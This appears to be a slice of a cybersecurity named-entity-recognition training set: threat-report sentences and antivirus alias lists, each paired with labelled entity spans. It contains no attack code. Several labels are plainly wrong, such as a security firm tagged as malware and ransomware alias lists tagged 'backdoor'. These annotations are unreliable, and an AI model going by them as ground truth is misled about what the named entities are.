{"text": "A backdoor also known as: W32.HfsAutoB.7B64 Trojan/W32.DoS.188416.C DoS.Win32.Small!O Trojan.Small DoS.W32.Small.to1D W32/VirTool.TK Win.Trojan.Small-13866 DoS.Win32.Small.ai Trojan.Win32.Small.bqdli Trojan.Win32.Small.188416 Trojan.Inject.762 Virus.Win32.Small W32/Tool.FQGY-6235 DoS.Small.h HackTool[DoS]/Win32.Small DoS.Win32.Small.ai HackTool:Win32/Upsodos.A Trojan/Win32.Flooder.R118574 DoS.Small Win32.Trojan.Small.Hpd Win32/Trojan.5b5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000813", "source": "cyner2_train"}}
{"text": "Shamoon is designed to destroy computer hard drives by wiping the master boot record MBR and data irretrievably, unlike ransomware, which holds the data hostage for a fee.", "spans": {"MALWARE: Shamoon": [[0, 7]], "SYSTEM: the master boot record MBR": [[62, 88]], "MALWARE: ransomware,": [[120, 131]]}, "info": {"id": "cyner2_train_000814", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Turla Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.Turla Backdoor.Win32.Turla.u Trojan.Win32.FKM.evjxqd Backdoor.W32.Turla!c Win32.Backdoor.Turla.Agvc W32/Trojan.GDRU-3141 Trojan.Win32.Z.Turla.37892 Backdoor.Win32.Turla.u Trojan:Win32/Ouftap.B W32/Turla.TCW!tr.bdr Backdoor.Turla Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000815", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader/W32.Cabby.379904 Trojan.Mauvaise.SL1 Ransom.Maktub Trojan/Filecoder.MaktubLocker.b W32/Trojan2.PUUQ Ransom_HPLOCKY.SME Trojan-Downloader.Win32.Cabby.zipxi Trojan.Win32.Cabby.ejsael Troj.Downloader.W32.Cabby.tnvB TrojWare.Win32.Cabby.SA Trojan.Encoder.7386 Downloader.Cabby.Win32.1866 Ransom_HPLOCKY.SME BehavesLike.Win32.ICLoader.fc W32/Trojan.RLTC-3878 TrojanDownloader.Cabby.coy Trojan[Downloader]/Win32.Cabby Trojan-Downloader.Win32.Cabby.zipxi Trojan/Win32.Locky.R192278 TrojanDownloader.Cabby Win32/Filecoder.MaktubLocker.B Trojan.DL.Cabby! Trojan.FileCryptor", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000817", "source": "cyner2_train"}}
{"text": "Based on the mutexes and domain names of some of their C C servers, BlackTech's campaigns are likely designed to steal their target's technology.", "spans": {"THREAT_ACTOR: BlackTech's campaigns": [[68, 89]], "ORGANIZATION: technology.": [[134, 145]]}, "info": {"id": "cyner2_train_000819", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.ChePro Win32.Trojan.WisdomEyes.16070401.9500.9810 Trojan-Banker.Win32.ChePro.ink Trojan.Win32.ChePro.eihuuw Trojan.Win32.Z.Banker.266752 Trojan.PWS.Banker1.15002 BehavesLike.Win32.Worm.dc Trojan.Banker.ChePro.ctf TR/Spy.Banker.hgsvz Trojan.Renos.96 Trojan-Banker.Win32.ChePro.ink Trojan:Win32/Tombrep.B Trojan/Win32.Banload.C579920 TrojanBanker.ChePro Trj/GdSda.A Win32.Trojan.Spy.Ebgv W32/Banker.ABMA!tr.spy", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000821", "source": "cyner2_train"}}
{"text": "Proofpoint recently observed a targeted email campaign attempting a spearphishing attack using a Game of Thrones lure.", "spans": {"ORGANIZATION: Proofpoint": [[0, 10]], "THREAT_ACTOR: a targeted email campaign": [[29, 54]], "SYSTEM: a Game of Thrones": [[95, 112]]}, "info": {"id": "cyner2_train_000825", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Win32.Trojan.WisdomEyes.16070401.9500.9727 Heur.Corrupt.PE Trojan.Win32.Refpron Packed.Koblu.adu", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000826", "source": "cyner2_train"}}
{"text": "The blog describes an incident that took place in late September of 2022.", "spans": {}, "info": {"id": "cyner2_train_000831", "source": "cyner2_train"}}
{"text": "Using powerful filters, various methods of communication with its operators and an interesting persistence technique, it aims to exfiltrate selected files from governmental and public institutions, which are mostly focused on economic growth and cooperation in Central and Eastern Europe.", "spans": {"THREAT_ACTOR: operators": [[66, 75]], "ORGANIZATION: governmental": [[160, 172]], "ORGANIZATION: public institutions,": [[177, 197]]}, "info": {"id": "cyner2_train_000833", "source": "cyner2_train"}}
{"text": "Our published investigations have now confirmed at least 19 individuals targeted with NSO in Mexico, including lawyers, politicians, journalists, anti-corruption activists, scientists, public health campaigners, government officials, and their family members.", "spans": {"ORGANIZATION: individuals": [[60, 71]], "ORGANIZATION: NSO": [[86, 89]], "ORGANIZATION: lawyers, politicians, journalists, anti-corruption activists, scientists, public health campaigners, government officials,": [[111, 233]], "ORGANIZATION: family members.": [[244, 259]]}, "info": {"id": "cyner2_train_000834", "source": "cyner2_train"}}
{"text": "The Windows bot's spreading method for Mirai is very limited as well – it only delivers the Mirai bots to a Linux host from a Windows host if it successfully brute forces a remote telnet connection.", "spans": {"SYSTEM: Windows": [[4, 11]], "MALWARE: bot's": [[12, 17]], "MALWARE: Mirai": [[39, 44]], "MALWARE: Mirai bots": [[92, 102]], "SYSTEM: Linux host": [[108, 118]], "SYSTEM: Windows host": [[126, 138]]}, "info": {"id": "cyner2_train_000835", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TrojanAPT.Garveep.MUE.DR4 TROJ_TAPAOUX.B Win32.Trojan.WisdomEyes.16070401.9500.9680 Backdoor.Trojan TROJ_TAPAOUX.B Trojan.Win32.Drop.bgdoxj Trojan.Win32.Tapaoux.357344 Trojan.MulDrop1.12202 Trojan.Win32.Pincav W32/Trojan.TEGY-1102 Trojan:Win32/Tapaoux.A TR/Tapaoux.A.3 Trojan[Backdoor]/Win32.Tusha Trojan:Win32/Tapaoux.A Dropper/Win32.Mudrop.C58765 Trojan.Tapaoux.A Win32/Trojan.Dropper.663", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000840", "source": "cyner2_train"}}
{"text": "They are bolder and more reckless than their more experienced veteran counterparts.", "spans": {}, "info": {"id": "cyner2_train_000845", "source": "cyner2_train"}}
{"text": "The criminals are also relying on a network of hacked servers to perform the multi-stage infection chain.", "spans": {"THREAT_ACTOR: criminals": [[4, 13]], "SYSTEM: hacked servers": [[47, 61]]}, "info": {"id": "cyner2_train_000847", "source": "cyner2_train"}}
{"text": "Periodically Necurs goes offline and during these periods we typically see Locky activity decrease drastically.", "spans": {}, "info": {"id": "cyner2_train_000848", "source": "cyner2_train"}}
{"text": "This particular ransomware appeared in 2014 when the operators of the Reveton Windows screen-locking ransomware decided to branch out and create an Android counterpart, which they began advertising on Russian-speaking hacking forums.", "spans": {"MALWARE: ransomware": [[16, 26]], "THREAT_ACTOR: operators": [[53, 62]], "MALWARE: the Reveton Windows screen-locking ransomware": [[66, 111]], "SYSTEM: Android": [[148, 155]], "THREAT_ACTOR: Russian-speaking hacking forums.": [[201, 233]]}, "info": {"id": "cyner2_train_000849", "source": "cyner2_train"}}
{"text": "The White House and Department of State are two of the most spectacular known victims.", "spans": {"ORGANIZATION: The White House and Department of State": [[0, 39]]}, "info": {"id": "cyner2_train_000850", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.HfsAutoB.2E84 Trojan.Facebook.VP Trojan.Chromex!ZGfUkXSe3KA Worm.Win32.Febipos.da Trojan:W32/Febipos.A Trojan.FBookCRTD.Win32.1277 Worm/Febipos.h TR/Drop.Febipos.E.7 Worm/Win32.Febipos.da Trojan/Win32.Febipos.N1033287704 TrojanDropper:Win32/Febipos.E Win32.Trojan.Falsesign.Pcib Trojan.Chromex!ZGfUkXSe3KA Trojan.Win32.Spy Stolen.D87 Trj/Thymus.J Win32/Trojan.357", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000851", "source": "cyner2_train"}}
{"text": "This case study contains information from an engagement that the RSA Incident Response IR team worked during the September to October 2013 timeframe.", "spans": {"ORGANIZATION: RSA Incident Response IR team": [[65, 94]]}, "info": {"id": "cyner2_train_000852", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Packed.Win32.TDSS!O RiskWare.Tool.CK Trojan.Win32.AutoRun.omsr W32.SillyDC TROJ_LOSABEL.SMD Trojan.Killav-157 Worm.Win32.AutoRun.rpm Worm.Win32.Autorun.74752.D[h] PE:Worm.Win32.DownLoad.jy!1075170189 Worm.Win32.AutoRun.~KZI Worm.AutoRun.Win32.89087 TROJ_LOSABEL.SMD BehavesLike.Win32.Downloader.cm Worm/Win32.AutoRun TrojanDownloader:Win32/Losabel.G Worm/Win32.AutoRun Downloader.Rozena", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000853", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.MSIL.DNGuard", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000854", "source": "cyner2_train"}}
{"text": "In the multiple incidents we have been involved in, the group has relied heavily on BeEF and Cobalt Strike.", "spans": {"THREAT_ACTOR: the group": [[52, 61]], "MALWARE: BeEF": [[84, 88]], "MALWARE: Cobalt Strike.": [[93, 107]]}, "info": {"id": "cyner2_train_000855", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Heur.RP.E74F56 BKDR_INJECT.SMA Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_INJECT.SMA Win.Trojan.Downloader-50333 TrojWare.Win32.Downloader.Inject.~E Trojan.DownLoad3.17548 Backdoor.Win32.Nbdd W32/Trojan.LFAS-4542 Trojan[Downloader]/Win32.Small TrojanDropper:Win32/Surin.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000857", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Mepaow.21127168 Trojan.Win32.Mepaow!O Trojanpws.Qqpass.16554 Trojan/Mepaow.mwv Win32.Trojan.WisdomEyes.16070401.9500.9707 Win32/Oflwr.A!crypt HV_MEPAOW_CI053B4B.RDXN Win32.Trojan.FlyStudio.F Trojan.Win32.Mepaow.mwv Trojan.Win32.Mepaow.dbtqtp Trojan.Win32.A.Mepaow.647168.A Troj.W32.Mepaow.mwv!c Worm.Win32.Dropper.RA Trojan:W32/DelfInject.R Trojan.MulDrop3.13823 Trojan.Mepaow.Win32.1575 Packed.PePatch.hiy Trojan/Win32.Mepaow Trojan.Buzy.33 Trojan.Win32.Mepaow.mwv Trojan:Win32/Rusparail.A Trojan.Mepaow Trj/CI.A Win32.Trojan.Spy.Pbpm Trojan.Mepaow!GQd1AlSBw3E W32/QQPass.ELG!tr.pws", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000859", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.TRSpy Trojan.DownLoader4.63572 Trojan/Win32.ADH Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000860", "source": "cyner2_train"}}
{"text": "Many of these domains are compromised legitimate websites, and will automatically expire from this pulse within a month.", "spans": {}, "info": {"id": "cyner2_train_000861", "source": "cyner2_train"}}
{"text": "add a guard code to monitor its own processes,", "spans": {}, "info": {"id": "cyner2_train_000862", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Onlinegames.P.mue Backdoor.Bot/Variant Trojan/Farfli.aag Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Inject.brokcs TrojWare.Win32.Farfli.S Trojan.DownLoad3.17387 BehavesLike.Win32.Virut.qh Win32.Troj.Injector.GD.kcloud Trojan.Graftor.DEF08 W32.W.Otwycal.kYP3 Trojan.Scar Win32/Farfli.AAG", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000863", "source": "cyner2_train"}}
{"text": "The early targets: a vast number of US military and government networks, including Wright Patterson and Kelly Air Force Bases, the Army Research Lab, the Naval Sea Systems Command in Indian Head, Maryland, NASA, and the Department of Energy labs.", "spans": {"ORGANIZATION: US military": [[36, 47]], "ORGANIZATION: government networks,": [[52, 72]], "ORGANIZATION: Wright Patterson": [[83, 99]], "ORGANIZATION: Kelly Air Force Bases, the Army Research Lab, the Naval Sea Systems Command in Indian Head, Maryland, NASA,": [[104, 211]], "ORGANIZATION: the Department of Energy labs.": [[216, 246]]}, "info": {"id": "cyner2_train_000866", "source": "cyner2_train"}}
{"text": "Poseidon scans the memory for running processes and employs keystroke logging to gather payment card data and credentials.", "spans": {"MALWARE: Poseidon": [[0, 8]], "MALWARE: keystroke logging": [[60, 77]]}, "info": {"id": "cyner2_train_000867", "source": "cyner2_train"}}
{"text": "This week Proofpoint researchers observed several noteworthy changes in the macros used by an actor we refer to as TA530, who we previously examined in relation to large-scale personalized malware campaigns", "spans": {"ORGANIZATION: Proofpoint researchers": [[10, 32]], "MALWARE: macros": [[76, 82]], "THREAT_ACTOR: an actor": [[91, 99]], "THREAT_ACTOR: TA530,": [[115, 121]], "THREAT_ACTOR: large-scale personalized malware campaigns": [[164, 206]]}, "info": {"id": "cyner2_train_000869", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.AutoITFldE1.Worm Trojan.AutoIT.AHP Worm.AUTOIT.Tupym.A W32/Tupym.worm W32.W.AutoRun.llU2 WORM_SOHAND.SM Win32.Trojan.WisdomEyes.16070401.9500.9890 W32/Autorun.SX W32.Svich WORM_SOHAND.SM Win.Worm.Autorun-313 Virus.Win32.Virut.ce Trojan.AutoIT.AHP Trojan.AutoIT.AHP Virus.Win32.Virut.Ce Trojan.AutoIT.AHP Win32.Virut.56 Worm.Autorun.Win32.63723 Worm.Win32.AutoRun W32/Autorun.HBBB-2740 Worm/AutoRun.agto WORM/Autorun.aaer Virus/Win32.Virut.ce Trojan.AutoIT.AHP Virus.Win32.Virut.ce Trojan:Win32/Peaac.A!gfc HEUR/Fakon.mwf Trojan.AutoIT.AHP I-Worm.Autoit.EB Worm.Win32.Autorun.fnc Trojan.Autoit.ZA W32/Autoit.AHP!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000870", "source": "cyner2_train"}}
{"text": "Rather, it uses a technique recently reported on by SensePost, which allows an attacker to craft a specifically created Microsoft Word document, which uses the Dynamic Data Exchange DDE protocol.", "spans": {"MALWARE: SensePost,": [[52, 62]], "THREAT_ACTOR: attacker": [[79, 87]], "SYSTEM: the Dynamic Data Exchange DDE protocol.": [[156, 195]]}, "info": {"id": "cyner2_train_000871", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan-Downloader/W32.Greetyah.3584 Trojandownloader.Greetyah Downloader-BW.d Trojan/Downloader.Greetyah.b Win32/Wmpatch.B TROJ_GREETYAH.B Trojan-Downloader.Win32.Greetyah.b Trojan.Win32.Greetyah.hjbl Trojan.Win32.Downloader.3584.DU Troj.Downloader.W32.Greetyah.b!c Trojan-Downloader.Win32.Greetyah.b Trojan.Sysman Downloader.Greetyah.Win32.1 TROJ_GREETYAH.B Downloader-BW.d W32/Risk.VHLX-8577 TrojanDownloader.Greetyah.b W32.Malware.Downloader Trojan[Downloader]/Win32.Greetyah Trojan.Barys.D7C0 Trojan-Downloader.Win32.Greetyah.b TrojanDownloader:Win32/Greetyah.B Trojan/Win32.Downloader.R94251 Win32/TrojanDownloader.Greetyah.B Win32.Trojan-downloader.Greetyah.Llho Trojan.DL.Greetyah!8XCxgqzFn7g Trojan-Downloader.Win32.Tiny W32/Greetyah.B!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000872", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9917 Trojan.Win32.ExtenBro.dqxgxi TR/Downloader.A.15310 TrojanDownloader:MSIL/Kilim.D Trj/CI.A Win32.Trojan.Downloader.Szvb Trojan.ExtenBro! MSIL/ExtenBro.BS!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000873", "source": "cyner2_train"}}
{"text": "The exploit takes advantage of a buffer overflow vulnerability in the demo version of a program called Uploader!.", "spans": {"MALWARE: exploit": [[4, 11]], "VULNERABILITY: buffer overflow vulnerability": [[33, 62]], "MALWARE: Uploader!.": [[103, 113]]}, "info": {"id": "cyner2_train_000876", "source": "cyner2_train"}}
{"text": "The subject is a series of targeted attacks against private companies around the world.", "spans": {}, "info": {"id": "cyner2_train_000878", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.CoinMiner.q Win32/CoinMiner.TD Trojan.BAT.BitMin.f Trojan.BtcMine.941 BehavesLike.Win32.Dropper.vc Trojan.Win32.CoinMiner TR/CoinMiner.nelvs Trojan.BAT.BitMin.f", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000879", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HT_FASONG_GA250334.UVPM Win32.Trojan-PSW.OLGames.bm HT_FASONG_GA250334.UVPM Win.Worm.Fasong-5 Win32.HLLW.Fasong.1 Trojan.Scar.Win32.103683 BehavesLike.Win32.BadFile.vh Worm.Win32.Fasong Worm:Win32/Fasong.I Trojan.Zusy.D3494E W32.W.Fasong.lZpB Win32/Fasong.J Trojan.Scar!YU9FfkV5QC0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000880", "source": "cyner2_train"}}
{"text": "At the time of this writing the domain is still serving malware.", "spans": {"MALWARE: malware.": [[56, 64]]}, "info": {"id": "cyner2_train_000883", "source": "cyner2_train"}}
{"text": "Send your Bitcoin wallet ID and personal installation key to e-mail wowsmith123456@posteo.net.", "spans": {}, "info": {"id": "cyner2_train_000884", "source": "cyner2_train"}}
{"text": "In this article, we will describe the details of our investigation.", "spans": {}, "info": {"id": "cyner2_train_000887", "source": "cyner2_train"}}
{"text": "Knownsec Security Team has followed up this incident ever since its happening.", "spans": {"ORGANIZATION: Knownsec Security Team": [[0, 22]]}, "info": {"id": "cyner2_train_000888", "source": "cyner2_train"}}
{"text": "A backdoor also known as: W32.FamVT.ExpiroPC.PE Virus.Win32.Sality!O TrojanPWS.Vkont Win32.Trojan.WisdomEyes.16070401.9500.9998 Trojan.Win32.Z.Packer.40610 Troj.W32.AntiAV.lApy BehavesLike.Win32.HLLPPhilis.nc Trojan/PSW.VKont.c TR/PSW.VKont.wwdih PWS:Win32/Vkont.A Trj/StartPage.DGO Backdoor.Win32.Hupigon Win32/Trojan.2ff", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000889", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Heuristic.BehavesLike.Win32.Packed.A TrojanDownloader:Win32/Whinetroe.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000891", "source": "cyner2_train"}}
{"text": "The two reports describe the same cybercriminal gang which stole up to several hundreds of millions of dollars from various financial institutions.", "spans": {"THREAT_ACTOR: cybercriminal gang": [[34, 52]], "ORGANIZATION: financial institutions.": [[124, 147]]}, "info": {"id": "cyner2_train_000892", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm/W32.Wozer.23552.B Worm.Wozer W32/Wozer.h Win32.Trojan.WisdomEyes.16070401.9500.9643 W32/Wozer.F W32.Wozer.Worm Email-Worm.Win32.Wozer.h Trojan.Win32.Wozer.eokb W32.W.Wozer.h!c Win32.Worm-email.Wozer.Wozu Worm.Win32.Wozer.H Win32.HLLW.Wozer.4 Worm.Wozer.Win32.11 BehavesLike.Win32.Backdoor.mc Backdoor.Win32.Optix I-Worm.Wozer.c Worm:Win32/Wozer.G@mm Worm[Email]/Win32.Wozer Worm.Wozer.h.kcloud Email-Worm.Win32.Wozer.h Worm:Win32/Wozer.G@mm Trojan/Win32.Rirc.R100483 Email-Worm.Wozer W32/Wozer.C.worm Win32/Wozer.H Worm.Wozer!/x/Vuw7rp3c W32/Wozer.H@mm Win32/Worm.Email-Worm.795", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000893", "source": "cyner2_train"}}
{"text": "This post discusses our findings and potential security risks to iOS device users.", "spans": {"VULNERABILITY: potential security risks": [[37, 61]], "SYSTEM: iOS device": [[65, 75]], "ORGANIZATION: users.": [[76, 82]]}, "info": {"id": "cyner2_train_000894", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Rootkit.27428 Trojan/W32.Rootkit.71040 Rootkit.27428 Backdoor.Rustock Rootkit.D6B24 Win32.Trojan.WisdomEyes.16070401.9500.9984 Hacktool.Rootkit Rootkit.27428 Rootkit.27428 Rootkit.27428 BehavesLike.Win32.Virut.kc Win32.Troj.Undef.kcloud Backdoor.Rustock Trojan.Win32.Rootkit Win32/RootKit.Rootkit.3e8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000895", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Worm.Kalockan Trojan.Graftor.D46F63 Win32.Trojan.WisdomEyes.16070401.9500.9926 Trojan.Win32.Z.Graftor.143360.EV BackDoor.Tdss Worm.Win32.Kalockan Worm:Win32/Kalockan.A Trj/CI.A Win32/Trojan.621", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000897", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Backdoor.Ciadoor.13.3 W32/VB-Dropper-based.2!Maximus Backdoor.Ciadoor BKDR_CIAD1.TOMA Backdoor.Win32.Ciadoor.cvi Backdoor.Win32.Ciadoor!IK Backdoor.Win32.Ciadoor.G Trojan.DownLoader.62487 BDS/Ciadoor.13.4 BKDR_CIAD1.TOMA Backdoor/Ciadoor.130 TrojanDropper:Win32/Ciadoor.C W32/VB-Dropper-based.2!Maximus Backdoor.Ciadoor.cvi Backdoor.CiaDoor.13 Backdoor.Win32.Ciadoor W32/Ciadoor.V13!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000899", "source": "cyner2_train"}}
{"text": "Using privilege escalation", "spans": {"VULNERABILITY: privilege escalation": [[6, 26]]}, "info": {"id": "cyner2_train_000901", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Ursus.A Backdoor/W32.Ursus.3072 BKDR_URSUS.A Win32.Trojan.WisdomEyes.16070401.9500.9999 Backdoor.Trojan BKDR_URSUS.A Win.Trojan.Ursus-1 Backdoor.Ursus.A Backdoor.Win32.Ursus Backdoor.Ursus.A Trojan.Win32.Ursus.ehmu Backdoor.Win32.Ursus.3072 Backdoor.W32.Ursus!c Backdoor.Ursus.A Backdoor.Win32.Ursus.A Backdoor.Ursus.A BACKDOOR.Trojan Backdoor.Ursus.Win32.1 W32.Trojan.Trojan-Backdoor-Ursu Trojan[Backdoor]/Win32.Ursus Backdoor.Ursus.A Backdoor.Win32.Ursus Backdoor:Win32/Ursus.A Backdoor.Ursus.A Backdoor.Ursus Bck/Ursus.B Win32/Ursus.A Win32.Backdoor.Ursus.Wvkp Backdoor.Ursus!H8M0lbEN7e8 Trojan.Win32.Ursus W32/Ursus.A!tr.bdr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000902", "source": "cyner2_train"}}
{"text": "Downeks uses third party websites to determine the external IP of the victim machine, possibly to determine victim location with GeoIP.", "spans": {"SYSTEM: machine,": [[77, 85]]}, "info": {"id": "cyner2_train_000904", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan.Ransom.Paradise W32/Trojan.PLFO-2827 Ransom_Paradiz.R029C0DAC18 MSIL.Trojan-Ransom.Paradise.A Trojan.Win32.Encoder.exgjts Trojan.Encoder.14933 Ransom_Paradiz.R029C0DAC18 TR/FileCoder.gourg Ransom:MSIL/Paradiz.A!bit Ransom.FileCryptor Trj/GdSda.A Trojan.Filecoder!HVBN1jZrlCU MSIL/Paradise.A!tr.ransom", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000906", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Backdoor.Tapazom Trojan.Heur.E5D2E1 Win32.Trojan.WisdomEyes.16070401.9500.9901 Trojan.Win32.Winlock.crkzwj Win32.Backdoor.Tapazom.Hrfh Trojan.Winlock.7759 Trojan.Delf.Win32.59125 Backdoor.Win32.Tapazom W32/Trojan.HYVM-8493 BDS/Tapazom.A.82 Trojan[Ransom]/Win32.Blocker Backdoor:Win32/Tapazom.A HEUR/Fakon.mwf Trojan.Blocker!KkFY0lqXiEM Win32/Trojan.e5e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000907", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.MSIL.Zapchast.akhiw Trojan/MSIL.Zapchast Trojan.Strictor.D1662C Trojan.MSIL.Zapchast.akhiw W32/Zapchast.AKHIW!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000908", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Trojan/W32.Flooder.581632 W32/Trojan.GGXC-4249 Hacktool.Flooder TROJ_DRBLAST.A Email-Flooder.Win32.DirectBlaster.651 Trojan.Win32.DirectBlaster.dggz Email-Flooder.W32.DirectBlaster.651!c Trojan.PWS.Hukle.67 TROJ_DRBLAST.A W32/Trojan.AFHI Flooder.DirectBlaster.b TR/Flood.DirectBlaster.651 HackTool[Flooder]/Win32.DirectBlaster Spammer:Win32/DirectBlaster.6_51 Email-Flooder.Win32.DirectBlaster.651 EmailFlooder.DirectBlaster Flooder/DBlaster.B Win32.Trojan.Directblaster.Wrqh Flooder.DirectBlaster!mE1A4daHzRk Malware_fam.gw", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000910", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9982 Backdoor.Trojan BehavesLike.Win32.BadFile.ht TrojanDropper:Win32/Fedripto.A Trojan.Buzy.DD86 Win32/Backdoor.e9a", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000911", "source": "cyner2_train"}}
{"text": "However, Unit 42 has recently discovered the actors have continued to evolve their custom malware arsenal.", "spans": {"ORGANIZATION: Unit 42": [[9, 16]], "THREAT_ACTOR: actors": [[45, 51]], "MALWARE: custom malware arsenal.": [[83, 106]]}, "info": {"id": "cyner2_train_000914", "source": "cyner2_train"}}
{"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9931 W32/Trojan2.HLRY W32.W.Fearso.kYUv Trojan.DownLoader5.44969 BehavesLike.Win32.Rootkit.ph W32/Trojan.LZVM-6897 Trojan:Win32/Lukicsel.A W32/Dx.TOC!tr Win32/Trojan.c9e", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000915", "source": "cyner2_train"}}
{"text": "Just starting to see the second run of today's Trickbot downloaders coming in.", "spans": {"MALWARE: Trickbot downloaders": [[47, 67]]}, "info": {"id": "cyner2_train_000916", "source": "cyner2_train"}}
{"text": "Sofacy also known as Fancy Bear Sednit STRONTIUM and APT28 is an advanced threat group that has been active since around 2008, targeting mostly military and government entities worldwide, with a focus on NATO countries.", "spans": {"THREAT_ACTOR: Sofacy": [[0, 6]], "THREAT_ACTOR: Fancy Bear": [[21, 31]], "THREAT_ACTOR: Sednit": [[32, 38]], "THREAT_ACTOR: STRONTIUM": [[39, 48]], "THREAT_ACTOR: APT28": [[53, 58]], "THREAT_ACTOR: advanced threat group": [[65, 86]], "ORGANIZATION: military": [[144, 152]], "ORGANIZATION: government entities": [[157, 176]]}, "info": {"id": "cyner2_train_000918", "source": "cyner2_train"}}
{"text": "A backdoor also known as: TR/RedCap.dtrps Exploit:Win32/Spectre.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000919", "source": "cyner2_train"}}
{"text": "A backdoor also known as: HW32.Packed.EB9A Trojan/AutoRun.VB.ahf W32/Risk.HKZN-7619 Worm.AutoRun.Win32.41218 W32/MalwareF.MDOM Trojan/Refroso.alid TR/Comitsproc.whlbv Trojan/Win32.Scar.R211104 TScope.Trojan.VB Trj/CI.A Win32.Worm.Autorun.Dyzv Worm.AutoRun!QjN27yFtykA Worm.Win32.AutoRun W32/AutoRun.RPV!worm Win32/Trojan.df1", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_000921", "source": "cyner2_train"}}
{"text": "On 29 March 2017 the German Federal Office for Information Security BSI said in a statement that the website of Israeli newspaper Jerusalem Post was manipulated and linked to a harmful third party.", "spans": {"ORGANIZATION: German Federal Office for Information Security BSI": [[21, 71]], "ORGANIZATION: Israeli newspaper Jerusalem Post": [[112, 144]]}, "info": {"id": "cyner2_train_000922", "source": "cyner2_train"}}
